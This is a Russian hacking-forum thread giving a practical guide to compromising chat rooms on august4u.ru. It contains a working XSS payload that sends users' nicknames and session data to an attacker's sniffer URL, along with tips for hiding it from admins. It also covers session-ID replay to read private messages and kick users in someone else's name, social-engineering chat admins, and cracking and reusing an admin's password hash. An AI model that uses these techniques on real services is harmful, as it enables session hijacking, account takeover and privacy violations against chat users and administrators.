ANTICHAT — форум по информационной безопасности, OSINT и технологиям

читай мануал

__________________
Лучший способ защиты - это нападение!!!

ну ты блин даёшь.
заид по ссылке http://domen.august4u.ru/help?tags и правой кнопкий мыши во всплывающем окне нажми просмотр HTML кода. и юзай оттуда подставляя свои значения. так глядишь и выучишь. а ещё лучше в гугле или любом поисковике пропиши, "Скачать учебник по руководству html" и учи=)

вот строка для отправки сообщений

http://{chat}.ru:8080/a=22&c={chat}&id=7fc02c0f71af5f6a&nick=Maloy&mess= Maloy%2C+%E3%F8&imess=


может вы ченить придумаети как взломать это мало что дас ну ктото можетже даже и через эту строку ломать!!!

http://{chat}.august4u.ru:8080/a=22&c={chat}&id=7fc02c0f71af5f6a&nick=Maloy&mess= Maloy%2C+%E3%F8&imess=

1)И так, чтение личных сообщений, записной книжки, килл от чужого имени, добавление привелегий и прочее:
1.1) нужен доступ в админку с открытым "Список юзеров"
1.2) далее в "Надписях" в строчке "Кто в чате" прописываеш снифер: "<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://[урл на сниф]?"+parent.Nick;+Nav.src;</script>Кто в чате" ....
1.2.1) можно сначала вместо надписи "Кто в чате" поставить картинку типа такой <img src="http://твой сайт/кто в чате.gif"> и админу сказать что картинку поставил и надпись прикольнее выглядит...
1.2.2)затем ес адин одобрит, то после картинки прописываем скрипт снифа и палева не будет!
1.3) далее в логе будет написан ник юзера и его сесия с id далее через IE_XSS_Kit подставляем id http://august4u.ru/send.php?sess=f3...e9c2b058ac2df7e&id=[id юзера]
1.4) килл от чужого имени: достаточно страничку килла сохранить на компе и заменить id, также надпсь TimeKill [20160] = "на две недели" можно заменить на TimeKill [40320] = "на 8==Э знает какое время=)" и TimeMute [10] = "на десять минут" на TimeMute [60] = "на 60 минут"

2) у вас может возникнуть вопрос примеру: "можно ли ещё куданито его спрятать?" - можно! есть даже те места где id лежит в чистом виде. Допустим где "настройки профиля" (граф-ник, цвет текста ника и собщений), смотрим св-ва странички и видим!! теперь остаётся спрятать в эту страничку сниф! смотрим вверх странички и видим надпись "настройки" (в каждом чате поразному написано), теперь досаточно зайти в админку и урл на картинку поставить.. лучше всего если использовать свой сниффер потомучто пустую картинку можно заменить на свою и лапоухий главный админ опять ничего непросечёт=)
Теперь идём в "просмотор разговора" - строка браузера - это просто достаточно в чат запустить картинку снифа и ждать что ктото начнёт просматривать разговор, но это муторно постоянно следить за логом, да и разговор не часто просматривают... ещё помоему место есть, это после входа в чат, слева есть надпись "привет, Nick" помоему вот сюда можно, но я не пробовал и уверен что есть ещё много мест...

3) Угон чата!!!: и так, мы нашли только что открывшийся чат! соответственно нет хорошего дизайна, своего форума да и сайта..
3.1) первая задача это скорешица с админом, к примеру с умением рисовать, показать ему парочку абалденных графических ников, дать пару ссылочек на картинки с задумкой дизайна и т.п. показать ему парочку КрАсИвЫх фраз для тегов.. вот после этого возможно админ и откроет админку!
3.2) делаем форум, сайт под управлением CMS. CMS - на мой взгляд более лучший вариант, разместив парочку прикольных прог, анегдотов, статей и прочего.. тем самым можно побыстрее набрать пользователей... мною был выбран хостинг jino-net.ru потомучто нет рекламы, удобная контрольная админ панель, есть аренда приложений - тем самым меньше гемора с установкой, 70 метров свободного места и 20 метров под БД...
3.3) после регистрации админа заходим в БД и вытаскиваем его хеш.. далее муторная расшифровка пароля... в моём случае пароль был простой "220788" (видимо день рождения) и подошёл на мыло, админ неиспользавал Outlook Express, The BAT, не удалил письма от support@august4u.ru который настоятельно просит сохранить данное письмо и использовать данный пароль...


З.Ы. хотелось бы оставить пару советов администраторам чатов, но думаю прочитав что написано выше - учтут ошибки, и пользуясь случаем и зная что сюда заглядывает администратор,(в простонародии "август" и "ёб***й август" - второе обычно выплывает при глюках чата), хотел бы оставить ему парочку строчек: будь челом, сделай возможность загрузки картинок вместо надписей и каждую под свой дизайн, на выбор - оставить надпись или использовать картинку; вызов собеседника (знаю, это геморно, опять глюки в чатах, но всёже - за шо те бабки платят? )

__________________
Лучший способ защиты - это нападение!!!

молодец, хорошо написал всё, расписал. только теперь я думаю август рассылку сделает, типа будьте бдительнее, не давайте свои админки и т.д. да и админов терь не нае*шь=)

спасибо! и пусть делает! но мне кажется в первую очередь он будет делать заплатки увести чат можно разными способами в том числе и СИ, темболее так можно увести и другие чаты...

__________________
Лучший способ защиты - это нападение!!!

__________________
Лучший способ защиты - это нападение!!!

да в принципе что именно там можно залатать, всё зависит от админов. хотя посмотрим, что он придумает, может и замутит что нибудь.